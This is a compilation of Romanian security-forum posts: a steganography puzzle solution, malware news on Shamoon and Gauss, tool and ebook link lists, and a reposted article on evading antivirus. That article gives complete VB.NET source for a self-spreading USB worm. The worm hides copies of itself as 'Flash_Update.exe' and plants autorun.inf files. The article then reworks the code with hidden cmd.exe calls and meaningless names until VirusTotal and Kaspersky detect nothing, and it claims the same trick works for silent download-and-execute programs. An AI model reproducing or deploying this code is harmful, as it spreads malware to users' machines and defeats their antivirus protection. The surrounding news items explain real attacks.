Usr6

@Hennessey nu folosesc 7 daca te-ai impotmolit acolo poti incerca: click dr pe poza, save image... Save as type > "All files (*.*) schimbi extensia din jpeg>rar >save sau command prompt: copy secimg.jpeg secimg.rar sau total commander: click pe secimg.jpeg > F5 > modifici acolo in secimg.rar etc. -----------------------//LE//----------------------- + bonus: tutorial cum sa ascunzi o arhiva intr-o poza http://www.online-tech-tips.com/computer-tips/hide-file-in-picture/ -----------------------//LE 2//----------------------- se pot ascunde multe lucruri intr-o poza: lectura de weekend: http://en.wikipedia.org/wiki/Steganography

pas1: save picture--> secimg.jpeg pas2: schimba numele: secimg.jpeg -->secimg.rar pas3: dezarhivare: pass:siemens sx1 pas4: numele fisierului obtinut: auonet.txt, citit invers: tenoua (T e noua) ->T9 T9 (predictive text) - Wikipedia, the free encyclopedia pas5: e nevoie de un tel cu limba romana care are activat t9, se tasteaza "33 2263 372 6632 28 43762642" -->"de cand era moda cu germania" pas6: google "de cand era moda cu germania"-> identificare model telefon: http://www.gsmarena.com/results.php3?sQuickSearch=yes&sName=siemens

Some Basics and Overview Usually when we talk about bypassing antivirus software, and especially when we talk about antivirus programs like NOD32, Kaspersky, BitDefender… We automatically think about deep coding knowledge, using undocumented APIs or using Zero days exploits, but this is not always true, since by applying some “very” basics approaches we will be able to bypass most of (if not all) antivirus programs, at least for doing some basic things. Basically, all antivirus programs detect malicious files the same way, either by checking for a digital signature inside of the files (which explains the importance of keeping your antivirus up to date) or by a technique called heuristic detection. This (and of course other criteria) usually makes the difference between a good and a bad antivirus. Signature detection Technically when an antivirus starts looking for a signature, it looks for “string(s)” found by Antivirus research labs and considered as a fingerprint that a malicious program code may have. Every single virus, worm, or any other malware has its own signature, and considering the fact that there are billions of malicious files in the world, and there are more and more malware developers, looking for a specific signature becomes almost impossible, so Antivirus labs and malware analysts start to give a kind of generic signature to help find a type of malicious program, and not the “one by one” way. Even using generic signatures, this detection mode is still archaic due to the diversity of ways to protect malware from being detected. Complex packers, custom encryption or polymorphism make this way of detection not 100% reliable, especially when it comes to detecting totally new viruses or very complex ones. Heuristic detection Almost all recent antivirus software have a heuristic detection mode which consists (in a very simple way) to simulate a file execution, then monitoring if this file performs any suspicious activities like replication, file injection, file downloading or hiding files from the explorer. This is quite clever, but may lead to generate lot of false positive detections since heuristic analysis is a kind of multi-criteria analysis based in most cases on “already known” codes, classes, methods, functions or some commands that are not usually implemented in widely used programs. This may be considered as a kind of weakness that would, and will be, exploited (later in this article) to avoid detection by this way of analysis, since at this stage, bypassing heuristic analysis is bypassing the whole antivirus because every “fully” new coded malware is totally unknown by the antivirus and will not be detectable instantly via a digital signature. The problem is not coding a harmful program; the real problem is spreading it out! As known, the aim of any malicious program coder is to infect or take the control of the largest number possible of computers, and this cannot be done manually, so almost every virus, worm, botnet, etc. has one or more ways to propagate implemented as functionality! And one of the most common modes used is self-spreading via removable disks like USB flash drives. The idea is quite simple: the malware will check periodically for removable disks (USB keys, memory cards, and even some external hard drives). If found, it will copy itself (replication of the original malware) on it / them under an appealing name or under a random one, but hides itself from the explorer by changing the file attributes, and will create an Autorun.inf file which will run the replication mode every time this removable disk is plugged into a computer. Our Main Goal For every new generation of Antivirus software, this behavior will be flagged as suspicious or malicious behavior and will be detected in most of cases as Trojan horse Dropper.Generic, Trojan.Generic or something similar! We will see how we can make a fully undetectable USB spreader, without any obfuscation or encryption, just by making the same thing the way Kaspersky’s heuristic analysis does not consider as “malicious behavior”. I’ll use VirusTotal to analyze generated files (even if it’s not important since our program is not really harmful) and all upcoming tests are made under Windows 7 Ultimate with the trial version of Kaspersky Internet Security 11.0.2.556 installed. All codes are in VB.NET using Frameworks 4, which is an uncommon language for coding malicious stuff, but it’s wise to say that some serious worms, viruses and remote administration tools were done using VB, VB.net or VBscript. Anyway, let’s make a USB dropper “the normal way” and see how it’s seen by VirusTotal and Kaspersky’s heuristic analysis. The Game Let’s start by making a basic USB spreader. If you want to make tests, just create a new project under Microsoft Visual Studio, and make sure you import System.Threading and System.IO then copy and paste this code: Imports System.Threading Imports System.IO Public Class Form1 Shared ReplicatedName As String = “USBsetup.exe” Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load StartUSBspreading() End Sub Sub StartUSBspreading() Try Do Dim Alldrives() As DriveInfo = DriveInfo.GetDrives() For Each DriveFound As DriveInfo In Alldrives If DriveFound.DriveType = “2? And DriveFound.IsReady = True Then System.IO.File.Copy(Application.ExecutablePath, DriveFound.RootDirectory.ToString & ReplicatedName, True) File.SetAttributes(DriveFound.RootDirectory.ToString & ReplicatedName, FileAttributes.Hidden) AutorunMaker(DriveFound) End If Next DriveFound Thread.Sleep(6000) Loop Catch ex As Exception End Try End Sub Public Shared Sub AutorunMaker(ByVal driveFound As DriveInfo) Try File.Delete(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”) Dim AutorunStreamWriter As New StreamWriter(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”) AutorunStreamWriter.WriteLine(“[autorun]“) AutorunStreamWriter.WriteLine(“shellexecute=” & ReplicatedName) AutorunStreamWriter.Flush() AutorunStreamWriter.Close() File.SetAttributes(Convert.ToString(driveFound.RootDirectory) & “autorun.inf”, FileAttributes.Hidden) Catch ex As Exception End Try End Sub End Class Instead of using direct APIs like WM_DEVICECHANGE that get you notified about hardware device changes, and to avoid the use of controls like timers, usually malicious programs coders use infinite loops looking for removable disks, and that sleep for seconds, just like what happens in this case. On program load, StartUSBspreading() is called and it gets all detected drives, then it looks only for removable ones. If the drive found is ready, the program makes a replication of itself and an aurotun.inf file that will load the replicated file, and hides both of the newly made files. VirusTotal did not return real useful information since it makes just a static analysis: File name: MyTestApp.exe Detection ratio: 1 / 42 Antivirus Result Update Jiangmin Trojan/Generic.niew 20120904 Kaspersky - 20120904 https://www.virustotal.com/file/497571ba2d8a51ae4a3f7ce3a9746fef3563bd18ed4cf126d4b1b34d4bcdcf9f/analysis/1346767444 With a detection ratio of 1/42 we may say that we have already an interesting achievement, but when running a heuristic analysis of Kaspersky it detects our program, which has no digital signature, as high risk program and neutralizes the threat. Figure 1 Behavior similar to PDM.Trojan.generic detected At this stage we can consider several changes on our code that may lead to decreased detection rate, like using classes and modules, but one of the most powerful – and easiest – techniques is renaming as many functions, subs and events used as possible. We said that heuristic analysis is based on already known stuff, and almost all malicious programs do the same things like damaging your computer, stealing personal data or spying on your activities … and most of these aims are reached using some common piece of codes, for example to make a keylogger, you will probably use APIs like SetWindowsHookEx and events like Hook_Keyboard(), and by changing subs and functions names to some common ones (like BooksManagers(), Baby, Chat_System(), etc.) malicious coders reach an unexpected detection ratio! Renaming already known functions and subs can actually decrease detection ratio very considerably. Our sample is just a few lines of code, and renaming subs will not bypass Kaspersky. Let’s think about this a second, our objective is clear: making a replication of our program and an Autorun.inf file in any plugged removable disk. Instead of using suspicious methods like File.Copy() and File.Delete(), we can possibly make Kaspersky and most antivirus programs believe that it’s the user who copied or deleted files by using another intermediary program that requires almost no privilege, which is Windows CMD command line (executable cmd.exe). By invoking the Windows command silently, we can do everything that could be done via the command line without any restrictions! We can make a thread that creates the autorun.inf file temporarily somewhere in the user’s system folder and another thread that checks for the presence of plugged removable disks and makes copy tasks via hidden instances of command line. This may seems strange, but after some tests I made, using weird names for functions, procedures, and methods may also help decrease the detection ratio. Here is the new code for our USB dropper: Imports System.Threading Imports System.IO Public Class Form1 Dim MyPogramPath As String = Application.ExecutablePath Dim MyAutPath As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “\microsoft\autorun.inf” Dim mo As New Thread(AddressOf makdeotrn) Dim k1 As New Thread(AddressOf kaynaChiKle) Sub OnchorhaWalakal2ajr(ByVal d As String) Try If Not IO.File.Exists(d & “Flash_Update.exe”) Then Dim Proc As New Process() Proc.StartInfo.FileName = “cmd.exe” Proc.StartInfo.Arguments = “/c copy “ & “”"” & MyPogramPath & “”"” & ” “ & “”"” & d & “Flash_Update.exe” Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden Proc.StartInfo.CreateNoWindow = False Proc.Start() Proc.WaitForExit() Proc.Close() FileSystem.SetAttr(d & “Flash_Update.exe”, FileAttribute.Hidden) End If Catch ex As Exception End Try End Sub Sub OnchorhaWalakal2ajr2(ByVal d As String) Try Dim Proc As New Process() Proc.StartInfo.FileName = “cmd.exe” Proc.StartInfo.Arguments = “/c copy “ & “”"” & MyAutPath & “”"” & ” “ & d Proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden Proc.StartInfo.CreateNoWindow = False Proc.Start() Proc.WaitForExit() Proc.Close() FileSystem.SetAttr(d & “autorun.inf”, FileAttribute.Hidden) Catch ex As Exception End Try End Sub Sub kaynaChiKle() a: Dim kle() As DriveInfo = DriveInfo.GetDrives() For Each found As DriveInfo In kle If found.DriveType = “2? And found.IsReady = True Then Try OnchorhaWalakal2ajr2(found.RootDirectory.ToString) OnchorhaWalakal2ajr(found.RootDirectory.ToString) Catch ex As Exception End Try End If Next found GoTo a End Sub Public Sub MakDeOtrn() Try Dim appdata As String = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) & “\microsoft\” Dim sw As New StreamWriter(appdata & “autorun.inf”) Dim s As String = appdata & “autorun.inf” If IO.File.Exists(s) Then Try IO.File.Delete(s) Catch ex1 As Exception End Try End If sw.WriteLine(“[autorun]“) sw.WriteLine(“shellexecute=” + “Flash_Update.exe”) sw.Flush() sw.Close() Catch ex As Exception End Try End Sub Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load mo.IsBackground = True mo.Start() k1.IsBackground = True k1.Start() End Sub End Class Some explanation for the code above: MakDeOtrn() will make autorun.inf into “C:\Users\UserName\AppData\Roaming\microsoft” designed to run a file called “Flash_Update.exe“ OnchorhaWalakal2ajr ( checks if the removable disk is not infected yet, if it’s true, we set the application that we want to start which is cmd.exe, we set the arguments that are in the command line which will copy the running program (our malicious program) to the removable disk found, under the name “Flash_Update.exe” and of course starts cmd.exe in a hidden window, and wait until the end of copying process to hide the replicated file from the explorer. OnchorhaWalakal2ajr2 ( does the same thing as #2 for “autorun.inf“ kaynaChiKle() will check infinitely for the presence of removable disks, if found it calls respectively procedures #3 and #2. Before testing this new generated program, VirusTotal now considers it as a clean file with a detection ratio of 0/41 as you can see from this link. (www.virustotal.com/file/62254a2968b9a9385a9510431b8023fa2db50b572b6c5d76fdfea0234df8ea03/analysis/1346780514/) Scanning our program with Kaspersky reveals absolutely nothing: Figure 2 No threat has been detected After starting it, our program spreads itself as seen here: To Conclude… We can make fully undetectable Download and Execute programs, even some silent Download and Install programs and some real silent adwares, and this with absolutely no deep coding knowledge, and the worst is that this simple technique seems to bypass all known antivirus (tested with 5 well known antivirus and further tests are to come), and we can make our spreader even more difficult to detect by encrypting or obfuscating it. Complicated things like bypassing antivirus, especially those like Kaspersky, NOD32, BitDefender or AntiVir may not need to be done the complicated way, the example of this USB spreader may let us conclude that as smart as an antivirus and its analysis are, there is always a “simple” way to cheat it. Sursa: http://resources.infosecinstitute.com/antivirus-evasions-the-making-of-a-full-undetectable-usb-dropper-spreader/

The fastest and lightest antivirus with spywareprotection. New approach delivers faster, more effective virus protection that's always up to date Won't conflict with other security programs, providing an added layer of protection Identifies and protects against new threats as soon as they emerge - without ever having to download security updates Scans PCs with blazing fast speed - won't disrupt your workSecureAnywhere™ AntiVirus 2012: Fastest, Lightest AntiVirus: SecureAnywhere AntiVirus 2012 | Webroot Download: Free Trial for the Fastest Internet Security Ever! Motivul pentru care renunt la ea:It is not possible to exclude specific folders from being scanned daca aveti programe considerate malware la care nu puteti renunta prin pc va este inutila Cine o doreste sa posteze aici, i-o voi trimite prin pm primul venit primul servit, inainte de a posta recititi motivul pt care o donez:) ----------------------------------------------------------------------------- done a fost trimisa lui Slice228

Our goal is simple: to help keep you safe on the web. And we’ve worked hard to ensure that the services we offer continually improve. But as a small, resource-constrained company, that can sometimes be challenging. So we’re delighted that Google, a long-time partner, has acquired VirusTotal. This is great news for you, and bad news for malware generators, because: The quality and power of our malware research tools will keep improving, most likely faster; and Google’s infrastructure will ensure that our tools are always ready, right when you need them. VirusTotal will continue to operate independently, maintaining our partnerships with other antivirus companies and security experts. This is an exciting step forward. Google has a long track record working to keep people safe online and we look forward to fighting the good fight together with them. VirusTotal Team Sursa: http://blog.virustotal.com/2012/09/an-update-from-virustotal.html

cei care l-ati executat, puteti sa va schimbati parolele:) malefic.net46.net/index.php

Malware being used in a new series of targeted attacks has bucked the trend, choosing to destroy the computers it infects rather than just stealing sensitive information, security researchers said. Called "Disttrack", the malware corrupts files, overwrites the infected machine's master boot record, and destroys the data so that it can't be recovered, according to reports from Symantec Security Response, Kaspersky Lab's Global Research and Analysis Team, and McAfee on Thursday. Disttrack has been observed in the Shamoon attacks, which has already affected at least one organization in the energy sector, Symantec said, but the company declined to provide any other details about the affected organization(s). "Threats with such destructive payloads are unusual and are not typical of targeted attacks," Symantec said. Disttrack appears to be made up of several components, including the initial dropper file, and two modules called wiper, and reporter. The initial infection occurs with the dropper component, or str.exe, which downloads additional files on the system, including the reporter and wiper modules, a 64-bit version of a file called trksrv.exe, and a device driver. "The initial infection vector is as of yet unknown, but the malware has the capability of spreading via Admin$ shares" on the network, McAfee said in its report. Once on the computer, the dropper file also installs trksvr.exe as a Windows service which starts automatically whenever the operating system starts. It creates at least four registry keys on the system. The reporter component is named netinit.exe, but the wiper module picks its filename from a list of 29 words. The list includes words such as ctrl, dfrag, dnslookup, and power. It appears the names were chosen so that at first glance, they would look like legitimate system files. The wiper module, whatever it is named, scans various directories, including Documents and Settings, Users, and Windows drivers, to compile two lists containing the pathnames of all the files in those folders. Affected files include documents, contents of the download, picture, video, music folders, Windows drivers, and User profiles. All the files on the list are overwritten with an image file (looks like a grey box next to another box) so that the files are "rendered useless," Symantec said. The two files listing the pathnames of the destroyed files are also overwritten. "The original contents of these files are lost and not recoverable," McAfee said in its report. The reporter module, netinit.exe, runs the moment the trksvr service is started, and repeats every five minutes, according to McAfee. This module's sole purpose is to report the information being collected from various directories to the malware's command-and-control server. In a HTTP Get request, the module sends data such as the number of files that were overwritten, the IP address of the compromised machines, and a random number which acts as a unique identifier. The downloaded device driver, drdisk.sys, is a legitimate device driver from a commercial applications and is used to allow programs low-level read and write access to hard disk drives. The wiper module uses the driver to overwrite the Master Boot Record (MBR) and the partition tables of the hard disk with the previously used image file. "This renders the hard disk unusable and will not be recognized by the system after rebooting," McAfee noted. The driver was digitally signed with the private cryptographic key belonging to EldoS Corporation, Kaspersky Lab said. In an analysis of the decrypted portions of the malware, Kaspersky researchers came across a string, "C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb," which seemed to hint at the earlier data-deleting malware also called Wiper, according to the Securelist post. That particular Wiper infected computers across the Middle East, particularly Iran, and deleted sensitive information from computers, earlier this year. The search for Wiper originally led to the discovery of Flame earlier this year. "Based upon our analysis, #shamoon is NOT the malware known as 'Wiper', which attacked Iran in April," Costin Raiu, director of global research and analysis at Kaspersky Lab said on Twitter. Early this morning, SecurityWeek reported computers at Saudi Arabia-based oil company Saudi Aramco, was hit by malware. It's not known at this time whether the malware was related to Disttrack as part of the Shamoon attacks. "We're aware of the malware and will continue to monitor the situation. There are allegations that it has infected at least one energy company, possibly two, but it's not clear if they were specific targets or infected by random chance,” researchers from the Tactical Analysis Center (TAC) of EnergySec, a non-profit that supports organizations within the energy sector in securing their critical technology infrastructures told SecurityWeek via email. “The destructive nature of this malware isn’t consistent with other targeted instances and, as of now, we have no indication that the situation warrants heightened measures. This may be a case of malware being highlighted given the [appropriate, in our opinion] attention on critical infrastructure security." Sursa: http://www.securityweek.com/disttrack-sabotage-malware-wipes-data-unnamed-middle-east-energy-organization alte articole pe aceiasi tema: http://www.infosecurity-magazine.com/view/27661/disttrackshamoon-a-new-targeted-and-destructive-virus/ http://www.securelist.com/en/blog/208193786/Shamoon_the_Wiper_Copycats_at_Work

Nu are nici o legatura cu IT-ul/security, dar este un documentar interesant. Descriere: Ce-ar fi dacã v-am spune totul, întreaga istorie a lumii? Dar dacã am face-o în doar douã ore? Da, vã vom istorisi întreaga poveste, de la Big Bang pânã în zilele noastre. Cum s-a pregãtit planeta pentru aparitia omului. Cum Epoca de Piatrã a dus la motorul cu aburi. Cum din primele seminte au crescut orase si civilizatii. Între toate acestea existã legãturi care duc chiar la tine. Pentru aceasta au trebuit însã sã treacã 13,7 miliarde de ani. În urmãtoarele douã ore vã vom arãta tot ce trebuie sã stiti. Link documentar: http://documentare.digitalarena.ro/istoria-lumii-in-2-ore-2011/

The Samurai Web Testing Framework is a LiveCD focused on web application testing. We have collected the top testing tools and pre-installed them to build the perfect environment for testing applications. SamuraiWTF Course Slides v13 - Black Hat Vegas 2012 versiuni anterioare,dvd: Samurai - Browse Files at SourceForge.net Sursa: http://sourceforge.net/projects/samurai/

http://static.hakin9.org/wp-content/uploads/2012/05/Ok?adka-Maj-166x240.jpg Download: Hakin9 Extra - 201205.pdf - 4shared.com Sursa //bug cred, nu apare poza update: download sandspace

A fost descoperit un algoritm pentru identificarea sursei oricarui tip de informatie Un cercetator portughez de la Scoala politehnica federala din Lausanne (EPFL) a pus la punct un sistem matematic care permite identificarea sursei unei informatii care circula intr-o retea, dar si a unei epidemii sau a unui atentat. Informatiile au fost facute publice vineri, de oficialii EPFL, relateaza agentia AFP. Cercetatorul Pedro Pinto, care lucreaza pentru Laboratorul de comunicatii audiovizuale al institutiei, este autorul sistemului "care s-ar putea dovedi un aliat pretios" pentru cei care trebuie sa efectueze anchete criminale sau care cerceteaza originea unei informatii. "Gratie metodei noastre, reusim sa ajungem la sursa tuturor tipurilor de informatii care circula intr-o retea", a explicat Pedro Pinto. Acesta a mentionat ca, pentru aceasta, va fi nevoie de monitorizarea numai a unui numar restrans de membri ai retelei. De exemplu, a precizat Pinto, se poate identifica autorul unui zvon care circula intre 500 de membri ai aceleiasi retele, observand numai mesajele a 15 sau 20 de contacte. "Algoritmul nostru este capabil sa refaca in sens invers drumul parcurs de informatie, iar apoi de a ajunge la sursa", a afirmat cercetatorul portughez. Omul de stiinta si-a testat de asemenea sistemul pentru a gasi originea unei maladii infectioase in Africa de Sud. Acesta a explicat si cum a facut acest lucru. "Prin modelarea retelelor de circulatie a apei, raurilor sau a transporturilor de oameni, noi am putut sa gasim locul unde au fost detectate primele cazuri", a spus Pinto. Totodata, cercetatorul a testat sistemul sau pe comunicatiile telefonice legate de pregatirile pentru atentatele din 11 septembrie 2011, iar prin reconstruirea retelei teroristilor, doar pe baza informatiilor aparute in presa, sistemul a reusit sa ofere trei potentiali suspecti, dintre care unul era liderul dovedit al atacurilor, potrivit anchetei oficiale. Sursa: http://www.ziare.com/magazin/stiinta-tehnica/a-fost-descoperit-un-algoritm-pentru-identificarea-sursei-oricarui-tip-de-informatie-1183710

in ro: Kaspersky Lab anunta descoperirea lui Gauss, un nou malware care ataca utilizatorii din Orientul Mijlociu. Gauss este un instrument de spionaj cibernetic, finantat de un stat. El a fost creat pentru a fura informatii confidentiale, cu precadere parolele introduse in browser, datele de autentificare pentru conturile de online banking, cookie-uri si configuratiile specifice ale computerelor infectate. Functionalitatea de troian pentru conturile de online banking identificata in Gauss reprezinta o caracteristica unica, nemaiintalnita pana acum in instrumentele de spionaj cibernetic finantate de state. Gauss a fost descoperit in timpul cercetarilor initiate de Uniunea Internationala a Telecomunicatiilor (ITU) imediat dupa descoperirea Flame. Eforturile acestei organizatii au rolul de a diminua riscurile cauzate de amenintarile informatice, cu scopul mentinerii pacii in mediul cibernetic. ITU, prin expertiza oferita de Kaspersky Lab, contribuie la intarirea securitatii cibernetice globale prin implicarea activa a guvernelor, sectorului privat, organizatiilor internationale si a societatii civile, pe langa partenerii activi din cadrul initiativei ITU-IMPACT. Expertii Kaspersky Lab au descoperit Gauss prin identificarea unor asemanari cu Flame. Printre acestea se numara platforma similara, structurile modulelor componente, codurile de criptare si caile de comunicare cu serverele de comanda si control (C&C). Sumar: -Gauss a devenit operational in luna septembrie 2011. -A fost identificat in iunie 2012, ca urmare a informatiilor stranse in timpul analizei in profunzime si a cercetarii realizate pentru virusul Flame. -Descoperirea a fost posibila datorita asemanarilor puternice dintre Flame si Gauss. -Infrastructura C&C a Gauss a fost inchisa in iulie 2012, la scurt timp dupa ce malware-ul a fost descoperit. In momentul de fata, Gauss se afla in stare latenta, asteptand reactivarea serverelor de comanda si control (C&C). -De la finalul lunii mai 2012, peste 2500 de infectii au fost inregistrate de sistemul de securitate „cloud“ al Kaspersky Lab, cu un numar de victime total estimat la nivelul zecilor de mii. Numarul este mai mic decat cel al victimelor Stuxnet, dar mai ridicat decat cel al victimelor Flame si Duqu. -Gauss fura informatii detaliate despre PC-ul infectat, inclusiv istoricul browser-ului, cookie-uri, parole si configuratii de sistem. De asemenea, este capabil sa adune datele de autentificare pentru diferite sisteme de plata online si conturi de online banking. -Analiza Gauss dezvaluie faptul ca a fost creat pentru a fura date de la diferite banci, in special banci libaneze, precum Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank si Credit Libanais. In plus, acesta tintea si clientii Citibank si PayPal. Modulul principal al acestui malware a fost numit de catre creatorii sai dupa matematicianul de origine germana, Johann Carl Friedrich Gauss. De asemenea, alte componente ale acestuia poarta numele unor matematicieni sau filosofi celebri, ca Joseph Louis Lagrange si Kurt Gödel. Investigatiile au dezvaluit faptul ca primele incidente informatice atribuite lui Gauss dateaza din luna septembrie 2011. In iulie 2012, serverele de comanda si control ale acestuia au incetat sa mai functioneze. Mai multe module ale lui Gauss au rolul de a colecta informatii din browser-ele web, inclusiv a istoricului site-urilor vizitate si a parolelor. Atacatorilor le sunt trimise si detalii referitoare la computerul infectat, date specifice interfetelor de retea, driver-elor de sistem si informatii despre BIOS. Gauss este capabil sa fure date de la clientii unor banci libaneze, precum Bank of Beirut, EBLF, BlomBank, ByblosBank, FransaBank si Credit Libanais. In plus, acesta tintea si clientii Citibank si PayPal. Un alt atribut-cheie a noii amenintari informatice este acela de a infecta stick-uri USB, folosind aceeasi vulnerabilitate LNK, identificata in Stuxnet si Flame. Insa, procesul de infectare prin USB este mult mai inteligent – Gauss are capacitatea de a „dezinfecta” stick-ul in anumite circumstante si foloseste dispozitivul pentru a stoca informatiile furate intr-un fisier ascuns. Pe langa acestea, troianul instaleaza un font special – Palida Narrow – al carui scop nu a fost inca identificat. Cu toate ca Gauss este foarte asemanator cu Flame, geografia infectiilor este diferita. Cele mai multe computere infectate de Flame se aflau in Iran, in timp ce majoritatea victimelor lui Gauss sunt localizate in Liban. Numarul infectiilor este, de asemenea, diferit. Cifrele Kaspersky Security Network (KSN) arata ca acesta a infectat aproximativ 2500 de computere, comparativ cu cele 700 compromise cu Flame. Cu toate ca metoda exacta folosita pentru infectarea PC-urilor nu este cunoscuta inca, nu exista niciun dubiu in faptul ca Gauss se raspandeste diferit fata de Flame sau Duqu. Cu toate acestea, asemenea ultimelor doua arme cibernetice descoperite, mecanismele de propagare sunt realizate intr-o maniera controlata, cu accent pe camuflarea si pastrarea secreta a operatiunilor. „Gauss seamana izbitor cu Flame atat la design, cat si la nivelul bazei de cod, lucru care ne-a ajutat la identificarea lui”, spune Alexander Gostev, Chief Security Expert la Kaspersky Lab. „Asemenea lui Flame si Duqu, Gauss este un instrument complex de spionaj cibernetic, cu un design creat special pentru camuflaj. Insa, scopul lui a fost diferit de cel al Duqu si Flame – Gauss tinteste utilizatori din mai multe tari, pentru a fura cantitati mari de date, in special informatii financiare si de banking”, completeaza Gostev. In momentul de fata, troianul Gauss este blocat si sters cu succes de catre toate suitele de securitate Kaspersky Lab. Acesta este identificat sub numele Trojan-Spy.Win32.Gauss. sursa: http://www.faravirusi.com/2012/08/09/kaspersky-lab-a-descoperit-gauss-o-noua-amenintare-informatica-avansata/

@nytro: dd if=\\.\Device\PhysicalMemory of=memory.bin bs=4096 Acquisition dd // nu cred ca face nimic in plus fata de toolurile deja existente, ex volatility: The Volatility Framework is a completely open collection of tools, implemented in Python under the GNU General Public License, for the extraction of digital artifacts from volatile memory (RAM) samples. Capabilities The Volatility Framework currently provides the following extraction capabilities for memory samples Image date and time Running processes Open network sockets Open network connections DLLs loaded for each process Open files for each process Open registry handles for each process A process' addressable memory OS kernel modules Mapping physical offsets to virtual addresses (strings to process) Virtual Address Descriptor information Scanning examples: processes, threads, sockets, connections,modules Extract executables from memory samples Transparently supports a variety of sample formats (ie, Crash dump, Hibernation, DD) Automated conversion between formats https://www.volatilesystems.com/default/volatility#overview volatility - An advanced memory forensics framework - Google Project Hosting

Moving to Microsoft Visual Studio 2010 Programming Windows 8 Apps Programming Windows Phone 7 Programming Windows Phone 7 (Special Excerpt 2) Office 365 – Connect and Collaborate virtually anywhere, anytime Microsoft Office 2010 First Look Security and Privacy for Microsoft Office 2010 Users Getting started with Microsoft Office 2010 – For IT Professionals Planning guide for Microsoft Office 2010 - For IT professionals Deployment guide for Microsoft Office 2010 - For IT professionals Operations guide for Microsoft Office 2010 - For IT professionals Technical reference for Microsoft Office 2010 - For IT professionals Understanding Microsoft Virtualization R2 Solutions Introducing Windows Server 2012 Introducing Microsoft SQL Server 2012 Introducing Microsoft SQL Server 2008 R2 Configure Kerberos Authentication for SharePoint 2010 Products Business continuity management for SharePoint Server 2010 Deployment guide for SharePoint Server 2010 Get started with SharePoint Server 2010 Governance guide for Microsoft SharePoint Server 2010 Profile synchronization guide for SharePoint Server 2010 Remote BLOB storage for Microsoft SharePoint Server 2010 Technical reference for Microsoft SharePoint Server 2010 Upgrading to SharePoint Server 2010 Getting Started with SharePoint Server 2010 Planning guide for sites and solutions for Microsoft SharePoint Server 2010, Part 1 Planning guide for sites and solutions for Microsoft SharePoint Server 2010, Part 2 Planning guide for server farms and environments for Microsoft SharePoint Server 2010 Capacity planning for Microsoft SharePoint Server 2010 SQL Server 2012 Tutorials: Analysis Services - Tabular Modeling Microsoft SQL Server AlwaysOn Solutions Guide for High Availability and Disaster Recovery Transact-SQL Data Manipulation Language (DML) Reference QuickStart: Learn DAX Basics in 30 Minutes SQL Server 2012 Tutorials: Analysis Services - Data Mining Microsoft SQL Server Analysis Services Multidimensional Performance and Operations Guide Data Analysis Expressions (DAX) Reference SQL Server 2012 Upgrade Technical Guide Backup and Restore of SQL Server Databases SQL Server 2012 Tutorials: Analysis Services - Multidimensional Modeling Master Data Services Capacity Guidelines Digital Storytelling Free Tools in the Classroom Windows Live Movie Maker in the Classroom Windows 7 in the Classroom Microsoft Office Web Apps Teaching Guide Microsoft Office in the Classroom Developing Critical Thinking through Web Research Skills Bing in the Classroom Moving Applications to the Cloud, 2nd Edition Windows Azure Prescriptive Guidance Windows Azure Service Bus Reference Intro to ASP.NET MVC 4 with Visual Studio (Beta) Deploying an ASP.NET Web Application to a Hosting Provider using Visual Studio Getting Started with ASP.NET 4.5 Web Forms (Beta) Introducing ASP.NET Web Pages 2 Own Your Future Windows 7 Power Users Guide Deploying Windows 7 Essential Guidance Welcome to Windows 7 What You Can Do Before You Call Tech Support (Windows 7) Link: http://blogs.msdn.com/b/mssmallbiz/archive/2012/07/27/large-collection-of-free-microsoft-ebooks-for-you-including-sharepoint-visual-studio-windows-phone-windows-8-office-365-office-2010-sql-server-2012-azure-and-more.aspx Developing an Advanced Windows Phone 7.5 App that Connects to the Cloud Developing Applications for the Cloud, 2nd Edition Building Hybrid Applications in the Cloud on Windows Azure Building Elastic and Resilient Cloud Applications - Developer's Guide to the Enterprise Library 5.0 Integration Pack for Windows Azure Technical reference for Microsoft SharePoint Server 2010 Getting started with Microsoft SharePoint Foundation 2010 Deployment guide for SharePoint 2013 Preview Deployment guide for Duet Enterprise for Microsoft SharePoint and SAP Server 2.0 Preview Microsoft Dynamics GP 2010 Guides: Financials Microsoft Dynamics CRM 2011 User's Guide Dynamics CRM 2011 Developer Training Kit Microsoft Dynamics CRM 2011 Implementation Guide Deployment guide for Office 2013 Preview Office 2010 Developer Training Kit Office 365 Developer Training Kit Office 365 Guides for professionals and small businesses Lync for Mac 2011 Deployment Guide Microsoft Lync Server 2010 Resource Kit Tools Microsoft Lync Server 2010 Resource Kit Microsoft Lync Server 2010 Security Guide Developing Applications for the Cloud – 2nd Edition Visual Studio LightSwitch Training Kit SQL Server 2012 Developer Training Kit "Own Your Space--Keep Yourself and Your Stuff Safe Online" Digital Book for Teens Link: http://blogs.msdn.com/b/mssmallbiz/archive/2012/07/30/another-large-collection-of-free-microsoft-ebooks-and-resource-kits-for-you-including-sharepoint-2013-office-2013-office-365-duet-2-0-azure-cloud-windows-phone-lync-dynamics-crm-and-more.aspx?wa=wsignin1.0

Panda Anti-Rootkit Download: http://research.pandasecurity.com/blogs/images/AntiRootkit.zip Sophos Anti RootKit Download: https://secure.sophos.com/support/cleaners/sar_15_sfx.exe McAfee RootKit Detective Download: http://downloadcenter.mcafee.com/products/mcafee-avert/rootkitremover.exe Avast rootkit scanner Download: http://public.avast.com/~gmerek/aswMBR.exe RootKit Hook Analyzer Download: http://www.resplendence.com/download/hookanlz302.exe Surse: Best Free Anti RootKit and RootKit Removal Software To Remove RootKit List of Anti-Rootkits - Technibble Forums -o lista mai completa cu programele anti rootkit

